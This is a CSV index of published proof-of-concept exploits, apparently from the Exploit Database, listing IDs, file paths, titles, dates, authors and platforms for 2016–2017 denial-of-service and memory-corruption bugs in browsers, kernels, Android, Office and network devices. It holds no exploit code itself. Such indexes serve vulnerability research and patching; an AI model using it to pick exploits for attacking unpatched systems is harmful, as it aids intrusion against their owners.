+40875,exploits/windows/dos/40875.html,"Microsoft Edge - JSON.parse Info Leak",2016-12-06,"Google Security Research",dos,windows, +40876,exploits/android/dos/40876.txt,"Google Android - 'IOMXNodeInstance::enableNativeBuffers' Unchecked Index",2016-12-06,"Google Security Research",dos,android, +40878,exploits/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,dos,windows, +40879,exploits/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,dos,windows, +40880,exploits/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,dos,windows, +40883,exploits/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)",2016-12-06,"Jeremy Brown",dos,windows, +40885,exploits/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,dos,windows, +40886,exploits/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",dos,hardware, +40888,exploits/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",dos,linux, +40896,exploits/windows/dos/40896.html,"Microsoft Internet Explorer 9 - MSHTML CElement::Has­Flag Memory Corruption",2016-12-09,Skylined,dos,windows, +40899,exploits/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,dos,linux, +40905,exploits/windows/dos/40905.py,"Serva 3.0.0 - HTTP Server Denial of Service",2016-12-12,LiquidWorm,dos,windows, +40906,exploits/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",dos,ios, +40909,exploits/linux/dos/40909.py,"Apache 2.4.23 mod_http2 - Denial of Service",2016-12-12,"Jungun Baek",dos,linux, +40910,exploits/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",dos,hardware, +40914,exploits/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",dos,android, +40915,exploits/windows/dos/40915.txt,"Adobe Animate 15.2.1.95 - Memory Corruption",2016-12-14,hyp3rlinx,dos,windows, +40925,exploits/windows/dos/40925.py,"Orthanc DICOM Server 1.1.0 - Memory Corruption",2016-12-16,LiquidWorm,dos,windows, +40922,exploits/windows/dos/40922.html,"Microsoft Internet Explorer 9 - MSHTML CMarkup::Reload­In­Compat­View Use-After-Free",2016-12-15,Skylined,dos,windows, +40923,exploits/windows/dos/40923.html,"Microsoft Internet Explorer 9 - IEFRAME CMarkup::Remove­Pointer­Pos Use-After-Free (MS13-055)",2016-12-15,Skylined,dos,windows, +40926,exploits/windows/dos/40926.py,"OsiriX DICOM Viewer 8.0.1 - Memory Corruption",2016-12-16,LiquidWorm,dos,windows, +40927,exploits/windows/dos/40927.py,"ConQuest DICOM Server 1.4.17d - Stack Buffer Overflow",2016-12-16,LiquidWorm,dos,windows, +40928,exploits/linux/dos/40928.py,"DCMTK 3.6.0 storescp - Stack Buffer Overflow",2016-12-16,LiquidWorm,dos,linux, +40929,exploits/osx/dos/40929.py,"Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service",2016-12-16,LiquidWorm,dos,osx, +40933,exploits/windows/dos/40933.svg,"Microsoft Internet Explorer 9 - IEFRAME CMarkup­Pointer::Move­To­Gap Use-After-Free",2016-12-16,Skylined,dos,windows, +40935,exploits/windows/dos/40935.html,"Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)",2016-12-16,Skylined,dos,windows, +40944,exploits/multiple/dos/40944.py,"Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read",2016-12-19,Skylined,dos,multiple, +40945,exploits/android/dos/40945.txt,"Google Android - WifiNative::setHotlist Stack Overflow",2016-12-20,"Google Security Research",dos,android, +40946,exploits/windows/dos/40946.html,"Microsoft Internet Explorer 11 - MSHTML CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)",2016-12-20,Skylined,dos,windows, +40947,exploits/windows/dos/40947.html,"Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)",2016-12-21,"Google Security Research",dos,windows, +40948,exploits/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",dos,windows, +40952,exploits/macos/dos/40952.c,"Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",dos,macos, +40954,exploits/macos/dos/40954.c,"Apple macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",dos,macos, +40955,exploits/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",dos,multiple, +40958,exploits/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",dos,multiple, +40959,exploits/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",dos,multiple, +40964,exploits/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,dos,windows, +40965,exploits/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",dos,windows, +40985,exploits/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,linux, +40994,exploits/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",dos,multiple, +40996,exploits/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",dos,php, +41008,exploits/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)",2017-01-11,COSIG,dos,multiple, +41012,exploits/multiple/dos/41012.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)",2017-01-11,COSIG,dos,multiple, +41018,exploits/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,dos,windows, +41025,exploits/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",dos,windows, +41030,exploits/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",dos,windows, +41042,exploits/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",dos,windows, +41142,exploits/unix/dos/41142.c,"SunOS 5.11 ICMP - Denial of Service",2017-01-22,"Todor Donev",dos,unix, +41145,exploits/multiple/dos/41145.py,"Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service",2017-01-23,ERPScan,dos,multiple, +41160,exploits/windows/dos/41160.py,"Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service",2017-01-26,b0nd,dos,windows, +41161,exploits/android/dos/41161.txt,"Google Android - 'pm_qos' KASLR Bypass",2017-01-26,"Google Security Research",dos,android, +41163,exploits/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",dos,multiple, +41164,exploits/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",dos,multiple, +41165,exploits/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",dos,multiple, +41192,exploits/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",dos,multiple, +41211,exploits/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",dos,android, +41212,exploits/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",dos,android, +41213,exploits/osx/dos/41213.html,"Apple WebKit - 'HTMLFormElement::reset()' Use-After Free",2017-02-01,"Google Security Research",dos,osx, +41214,exploits/multiple/dos/41214.html,"Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion",2017-02-01,"Google Security Research",dos,multiple, +41215,exploits/multiple/dos/41215.html,"Apple WebKit - 'HTMLKeygenElement' Type Confusion",2017-02-01,"Google Security Research",dos,multiple, +41216,exploits/multiple/dos/41216.html,"Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled",2017-02-01,"Google Security Research",dos,multiple, +41218,exploits/android/dos/41218.txt,"Google Android - RKP Information Disclosure via s2-remapping Physical Ranges",2017-02-01,"Google Security Research",dos,android, +41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,dos,hardware, +41222,exploits/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",dos,windows, +41232,exploits/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",dos,android, +41278,exploits/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,dos,openbsd,80 +41363,exploits/windows/dos/41363.txt,"Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",dos,windows, +41350,exploits/linux/dos/41350.c,"Linux Kernel 3.10.0 (CentOS7) - Denial of Service",2017-02-12,FarazPajohan,dos,linux, +41351,exploits/android/dos/41351.txt,"LG G4 - lgdrmserver Binder Service Multiple Race Conditions",2017-02-14,"Google Security Research",dos,android, +41352,exploits/android/dos/41352.txt,"LG G4 - lghashstorageserver Directory Traversal",2017-02-14,"Google Security Research",dos,android, +41353,exploits/android/dos/41353.txt,"LG G4 - Touchscreen Driver write_log Kernel Read/Write",2017-02-14,"Google Security Research",dos,android, +41354,exploits/android/dos/41354.txt,"Google Android - Inter-process munmap in android.util.MemoryIntArray",2017-02-14,"Google Security Research",dos,android, +41355,exploits/android/dos/41355.txt,"Google Android - android.util.MemoryIntArray Ashmem Race Conditions",2017-02-14,"Google Security Research",dos,android, +41357,exploits/windows/dos/41357.html,"Microsoft Edge - TypedArray.sort Use-After-Free (MS16-145)",2017-02-14,"Google Security Research",dos,windows, +41364,exploits/windows/dos/41364.txt,"NVIDIA Driver 375.70 - DxgkDdiEscape 0x100008b Out-of-Bounds Read/Write",2017-02-15,"Google Security Research",dos,windows, +41365,exploits/windows/dos/41365.txt,"NVIDIA Driver 375.70 - Buffer Overflow in Command Buffer Submission",2017-02-15,"Google Security Research",dos,windows, +41367,exploits/windows/dos/41367.txt,"GOM Player 2.3.10.5266 - '.fpx' Denial of Service",2017-02-15,"Peter Baris",dos,windows, +41369,exploits/hardware/dos/41369.txt,"Cisco ASA - WebVPN CIFS Handling Buffer Overflow",2017-02-15,"Google Security Research",dos,hardware, +41417,exploits/windows/dos/41417.txt,"Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption",2017-02-21,"Google Security Research",dos,windows, +41418,exploits/windows/dos/41418.txt,"Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access",2017-02-21,"Google Security Research",dos,windows, +41419,exploits/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 - GDI 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",dos,windows, +41420,exploits/multiple/dos/41420.txt,"Adobe Flash - MP4 AMF Parsing Overflow",2017-02-21,"Google Security Research",dos,multiple, +41421,exploits/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",dos,multiple, +41422,exploits/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",dos,multiple, +41423,exploits/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",dos,multiple, +41425,exploits/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,dos,windows, +41426,exploits/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,dos,windows, +41434,exploits/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",dos,multiple, +41454,exploits/windows/dos/41454.html,"Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",dos,windows, +41457,exploits/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)",2017-02-26,"Andrey Konovalov",dos,linux, +41474,exploits/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",dos,windows, +41475,exploits/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",dos,windows, +41537,exploits/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin & Arik Kublanov",dos,hardware, +41547,exploits/win_x86-64/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",dos,win_x86-64, +41565,exploits/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",dos,hardware, +41596,exploits/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",dos,windows, +41601,exploits/hardware/dos/41601.c,"MikroTik Router - ARP Table OverFlow Denial Of Service",2017-03-05,FarazPajohan,dos,hardware, +41608,exploits/multiple/dos/41608.txt,"Adobe Flash - Metadata Parsing Out-of-Bounds Read",2017-03-15,"Google Security Research",dos,multiple, +41609,exploits/multiple/dos/41609.txt,"Adobe Flash - MovieClip Attach init Object Use-After-Free",2017-03-15,"Google Security Research",dos,multiple, +41610,exploits/multiple/dos/41610.txt,"Adobe Flash - ATF Thumbnailing Heap Overflow",2017-03-15,"Google Security Research",dos,multiple, +41611,exploits/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",dos,multiple, +41612,exploits/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",dos,multiple, +41615,exploits/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",dos,windows, +41620,exploits/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",dos,windows, +41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows, +41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows, +41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows, +41639,exploits/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,dos,windows, +41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, +41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, +41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41647,exploits/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41648,exploits/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41649,exploits/windows/dos/41649.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41650,exploits/windows/dos/41650.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!MergeLigRecords' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41651,exploits/windows/dos/41651.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41652,exploits/windows/dos/41652.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41653,exploits/windows/dos/41653.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption Around 'USP10!BuildFSM' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41654,exploits/windows/dos/41654.txt,"Microsoft Windows - Uniscribe Font Processing Buffer Overflow in 'USP10!FillAlternatesList' (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41655,exploits/windows/dos/41655.txt,"Microsoft Windows - Uniscribe Font Processing Multiple Heap-Based Out-of-Bounds and Wild Reads (MS17-011)",2017-03-20,"Google Security Research",dos,windows, +41656,exploits/windows/dos/41656.txt,"Microsoft GDI+ - 'gdiplus!GetRECTSForPlayback' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",dos,windows, +41657,exploits/windows/dos/41657.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!Fill_ushort_ELUTs_from_lut16Tag' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",dos,windows, +41658,exploits/windows/dos/41658.txt,"Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)",2017-03-20,"Google Security Research",dos,windows, +41659,exploits/windows/dos/41659.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",dos,windows, +41660,exploits/multiple/dos/41660.html,"Mozilla Firefox - 'table' Use-After-Free",2017-03-20,"Google Security Research",dos,multiple, +41661,exploits/windows/dos/41661.html,"Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",dos,windows, +41667,exploits/windows/dos/41667.py,"SpyCamLizard 1.230 - Denial of Service",2017-03-22,ScrR1pTK1dd13,dos,windows, +41668,exploits/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",dos,multiple, +41669,exploits/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",dos,multiple, +41670,exploits/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",dos,multiple, +41791,exploits/macos/dos/41791.c,"Apple macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",dos,macos, +41792,exploits/multiple/dos/41792.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",dos,multiple, +41797,exploits/macos/dos/41797.c,"Apple macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",dos,macos, +41794,exploits/multiple/dos/41794.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",dos,multiple, +41826,exploits/hardware/dos/41826.txt,"Cesanta Mongoose OS - Use-After-Free",2017-04-06,"Compass Security",dos,hardware, +41778,exploits/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",dos,multiple, +41781,exploits/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,dos,linux, +41790,exploits/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",dos,macos, +42223,exploits/windows/dos/42223.cpp,"Microsoft Windows - 'win32k!NtGdiExtGetObjectW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42750,exploits/windows/dos/42750.cpp,"Microsoft Windows Kernel - 'win32k!NtQueryCompositionSurfaceBinding' Stack Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, +41916,exploits/windows/dos/41916.py,"PrivateTunnel Client 2.8 - Local Buffer Overflow (SEH)",2017-04-25,Muhann4d,dos,windows, +42459,exploits/windows/dos/42459.html,"Microsoft Edge 38.14393.1066.0 - 'CInputDateTimeScrollerElement::_SelectValueInternal' Out-of-Bounds Read",2017-08-16,"Google Security Research",dos,windows, +41715,exploits/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",dos,linux, +41734,exploits/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",dos,windows, +41737,exploits/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",dos,windows, +41741,exploits/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",dos,multiple, +41742,exploits/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",dos,multiple, +41743,exploits/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",dos,multiple, +41752,exploits/hardware/dos/41752.pl,"MikroTik RouterBoard 6.38.5 - Denial of Service",2017-03-28,FarazPajohan,dos,hardware, +41755,exploits/windows/dos/41755.py,"VX Search Enterprise 9.5.12 - 'Verify Email' Buffer Overflow",2017-03-28,ScrR1pTK1dd13,dos,windows, +41756,exploits/windows/dos/41756.txt,"Microsoft Outlook - HTML Email Denial of Service",2017-03-28,"Haifei Li",dos,windows, +41767,exploits/linux/dos/41767.txt,"Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure",2014-01-14,halfdog,dos,linux, +41768,exploits/linux/dos/41768.txt,"Apache 2.2 - Scoreboard Invalid Free On Shutdown",2012-01-11,halfdog,dos,linux, +41769,exploits/linux/dos/41769.txt,"Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow",2011-11-02,halfdog,dos,linux, +41806,exploits/hardware/dos/41806.txt,"Broadcom Wi-Fi SoC - Heap Overflow 'wlc_tdls_cal_mic_chk' Due to Large RSN IE in TDLS Setup Confirm Frame",2017-04-04,"Google Security Research",dos,hardware, +41807,exploits/multiple/dos/41807.html,"Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free",2017-04-04,"Google Security Research",dos,multiple, +41809,exploits/multiple/dos/41809.html,"Apple WebKit - 'RenderLayer' Use-After-Free",2017-04-04,"Google Security Research",dos,multiple, +41810,exploits/multiple/dos/41810.html,"Apple WebKit - Negative-Size memmove in HTMLFormElement",2017-04-04,"Google Security Research",dos,multiple, +41811,exploits/multiple/dos/41811.html,"Apple WebKit - 'FormSubmission::create' Use-After-Free",2017-04-04,"Google Security Research",dos,multiple, +41812,exploits/multiple/dos/41812.html,"Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free",2017-04-04,"Google Security Research",dos,multiple, +41813,exploits/multiple/dos/41813.html,"Apple WebKit - 'table' Use-After-Free",2017-04-04,"Google Security Research",dos,multiple, +41814,exploits/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",dos,multiple, +41823,exploits/windows/dos/41823.py,"CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)",2017-03-16,redr2e,dos,windows, +42088,exploits/windows/dos/42088.txt,"Microsoft MsMpEng - Remote Use-After-Free Due to Design Issue in GC Engine",2017-05-30,"Google Security Research",dos,windows, +41851,exploits/windows/dos/41851.txt,"Moxa MXview 2.8 - Denial of Service",2017-04-10,hyp3rlinx,dos,windows, +41867,exploits/multiple/dos/41867.html,"Apple WebKit - 'JSC::B3::Procedure::resetReachability' Use-After-Free",2017-04-11,"Google Security Research",dos,multiple, +41868,exploits/multiple/dos/41868.html,"Apple WebKit - 'Document::adoptNode' Use-After-Free",2017-04-11,"Google Security Research",dos,multiple, +41869,exploits/multiple/dos/41869.html,"Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow",2017-04-11,"Google Security Research",dos,multiple, +41879,exploits/windows/dos/41879.txt,"Microsoft Windows Kernel - 'win32k.sys' Multiple 'NtGdiGetDIBitsInternal' System Call",2017-04-13,"Google Security Research",dos,windows, +41880,exploits/windows/dos/41880.cpp,"Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure",2017-04-13,"Google Security Research",dos,windows, +41891,exploits/windows/dos/41891.rb,"Microsoft Windows - Unauthenticated SMB Remote Code Execution Scanner (MS17-010) (Metasploit)",2017-04-17,"Sean Dillon",dos,windows,445 +41893,exploits/linux/dos/41893.txt,"pinfo 0.6.9 - Local Buffer Overflow",2017-04-18,"Nassim Asrir",dos,linux, +41898,exploits/linux/dos/41898.txt,"Dmitry 1.3a - Local Buffer Overflow",2017-04-19,FarazPajohan,dos,linux, +41905,exploits/multiple/dos/41905.txt,"Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",dos,multiple, +41906,exploits/multiple/dos/41906.txt,"Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",dos,multiple, +41911,exploits/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,dos,windows, +41931,exploits/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",dos,multiple, +41932,exploits/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",dos,multiple, +41941,exploits/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",dos,windows, +41945,exploits/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",dos,windows, +41949,exploits/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",dos,windows, +41954,exploits/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",dos,multiple, +41957,exploits/windows/dos/41957.html,"Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free",2017-05-03,"Marcin Ressel",dos,windows, +41965,exploits/java/dos/41965.txt,"CloudBees Jenkins 2.32.1 - Java Deserialization",2017-05-05,SecuriTeam,dos,java, +41974,exploits/linux/dos/41974.rb,"RPCBind / libtirpc - Denial of Service",2017-05-08,"Guido Vranken",dos,linux,111 +41981,exploits/android/dos/41981.txt,"LG G4 MRA58K - 'liblg_parser_mkv.so' Bad Allocation Calls",2017-05-09,"Google Security Research",dos,android, +41982,exploits/android/dos/41982.txt,"LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers",2017-05-09,"Google Security Research",dos,android, +41983,exploits/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflow",2017-05-09,"Google Security Research",dos,android, +41984,exploits/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,dos,multiple, +41991,exploits/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap-Based Buffer Overflow",2017-05-10,"Core Security",dos,linux, +41993,exploits/multiple/dos/41993.py,"OpenVPN 2.4.0 - Unauthenticated Denial of Service",2017-05-11,QuarksLab,dos,multiple,1194 +42001,exploits/windows/dos/42001.py,"Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,dos,windows, 